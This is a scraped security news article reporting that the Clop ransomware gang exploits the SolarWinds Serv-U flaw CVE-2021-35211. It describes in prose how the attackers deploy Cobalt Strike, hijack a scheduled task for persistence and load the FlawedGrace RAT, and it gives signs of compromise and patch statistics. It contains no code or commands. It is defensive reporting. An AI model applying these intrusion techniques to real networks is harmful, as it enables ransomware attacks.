State hackers breach defense, energy, healthcare orgs worldwide
MediaMarkt hit by Hive ransomware, initial $240 million ransom
REvil ransomware affiliates arrested in Romania and Kuwait
Pwn2Own: Printer plays AC/DC, Samsung Galaxy S21 hacked twice
NUCLEUS:13 TCP security bugs impact critical healthcare devices
TeamTNT hackers target your poorly configured Docker servers
Microsoft: Windows 10 2004 reaches end of service next month
Microsoft urges Exchange admins to patch bug exploited in the wild
Qualys BrowserCheck
Junkware Removal Tool
How to remove the PBlock+ adware browser extension
Remove the Search Redirect
Remove the Search Redirect
Remove the Search Redirect
Remove Security Tool and SecurityTool (Uninstall Guide)
How to remove Antivirus 2009 (Uninstall Instructions)
How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo
How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller
Locky Ransomware Information, Help Guide, and FAQ
CryptoLocker Ransomware Information Guide and FAQ
CryptorBit and HowDecrypt Information Guide and FAQ
CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ
How to make the Start menu full screen in Windows 10
How to install the Microsoft Visual C++ 2015 Runtime
How to open an elevated PowerShell Admin prompt in Windows 10
How to Translate a Web Page in Google Chrome
How to start Windows in Safe Mode
How to remove a Trojan, Virus, Worm, or other Malware
How to show hidden files in Windows 7
How to see hidden files in Windows
IT Certification Courses
Gear + Gadgets
The Clop ransomware gang, also tracked as TA505 and FIN11, is exploiting a SolarWinds Serv-U vulnerability to breach corporate networks and ultimately encrypt its devices.
The Serv-U Managed File Transfer and Serv-U Secure FTP remote code execution vulnerability, tracked as CVE-2021-35211, allows a remote threat actor to execute commands on a vulnerable server with elevated privileges.
SolarWinds released an emergency security update in July 2021 after discovering a “a single threat actor” exploiting it in attacks.
The company also warned that this vulnerability only affects customers who have enabled the SSH feature, which is commonly used to further protect connections to the FTP server.
According to a new report by the NCC Group, there’s been an uptick in Clop ransomware infections in the past couple of weeks, with most of them starting with the exploitation of CVE-2021-35211.
While the Clop gang is known to use vulnerabilities in their attacks, such as the Accellion zero-day attacks, the researchers state that TA505 more commonly uses phishing emails with malicious attachments to breach networks.
In the new attacks spotted by NCC, the threat actors exploit Serv-U to spawn a sub-process controlled by the attackers, thus enabling them to run commands on the target system.
This opens up the way for malware deployment, network reconnaissance, and lateral movement, essentially laying the ground for a ransomware attack.
A characteristic sign of this flaw being exploited is exception errors in the Serv-U logs, caused when the vulnerability is exploited.
The exception error shown in logs will be similar to the following string:
Another sign of exploitation is traces of PowerShell command execution, which is used to deploy a Cobalt Strike beacon on the vulnerable system.
For persistence, the actors hijack a legitimate scheduled task that is used for regularly backing up registry hives and abuse the associated COM handler to load ‘FlawedGrace RAT.’
FlawedGrace is a tool that TA505 has been using since at least November 2017, and it remains a reliable part of the group’s arsenal.
NCC Group has posted the following handy checklist for system administrators who suspect compromise:
Despite the numerous alerts to apply the security update, many vulnerable Serv-U servers remain publicly accessible.
Most vulnerable Serv-U FTP instances are located in China, while the United States comes in second.
It’s been almost four months since SolarWinds released the security update for this vulnerability, but the percentage of potentially vulnerable Serv-U servers remains above 60%.
“In July, 5945 (~94%) of all Serv-U (S)FTP services identified on port 22 were potentially vulnerable. In October, three months after SolarWinds released their patch, the number of potentially vulnerable servers is still significant at 2784 (66.5%),” warn the researchers in their report.
Operation Cyclone deals blow to Clop ransomware operation
Microsoft Exchange ProxyShell exploits used to deploy Babuk ransomware
Ukraine arrests Clop ransomware gang members, seizes servers
The Week in Ransomware – September 24th 2021 – Targeting crypto
Microsoft: Windows MSHTML bug now exploited by ransomware gangs
Not a member yet? Register Now
MediaMarkt hit by Hive ransomware, initial $240 million ransom
State hackers breach defense, energy, healthcare orgs worldwide
To receive periodic updates and news from BleepingComputer, please use the form below.
Terms of Use Privacy PolicyEthics Statement
Copyright @ 2003 – 2021 Bleeping Computer® LLC – All Rights Reserved
Not a member yet? Register Now
Read our posting guidelinese to learn what content is prohibited.


You May Also Like

This image looks very different on Apple devices — see for yourself

TellYouThePass ransomware revived in Linux, Windows Log4j attacksCredit card info of 1.8…

Minecraft rushes out patch for critical Log4j vulnerability

New zero-day exploit for Log4j Java library is an enterprise nightmareALPHV BlackCat…

Mobile phishing attacks targeting energy sector surge by 161%

CISA orders federal agencies to fix hundreds of exploited security flawsUS sanctions…

Surveillance firm pays $1 million fine after 'spy van' scandal

AMD fixes dozens of Windows 10 graphics driver security bugsVoid Balaur hackers-for-hire…